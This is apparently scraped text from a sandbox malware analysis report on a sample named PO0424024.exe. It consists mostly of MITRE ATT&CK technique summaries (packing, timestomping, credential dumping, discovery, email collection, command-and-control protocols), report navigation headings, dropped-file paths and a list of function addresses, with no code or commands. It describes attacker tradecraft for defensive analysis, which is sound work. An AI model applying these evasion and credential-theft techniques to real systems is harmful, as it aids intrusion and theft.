Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO0424024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO0424024.exe.log

C:\Users\user\AppData\Local\Temp\43PI9J

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
PO0424024.exe

Function 04D92868 Relevance: 2.6, Strings: 2, Instructions: 120
COMMON

Function 0710DB6C Relevance: 1.8, APIs: 1, Instructions: 325
processCOMMON

Function 0710DB78 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Function 0257AFA3 Relevance: 1.7, APIs: 1, Instructions: 219
COMMON

Function 04CC1E7B Relevance: 1.7, APIs: 1, Instructions: 208
COMMON

Function 04CC1ED0 Relevance: 1.7, APIs: 1, Instructions: 182
COMMON

Function 02573E44 Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Function 02575E22 Relevance: 1.6, APIs: 1, Instructions: 124
COMMON

Function 02575E63 Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Function 0710D7E9 Relevance: 1.6, APIs: 1, Instructions: 121
injectionCOMMON

Function 0710D7F0 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre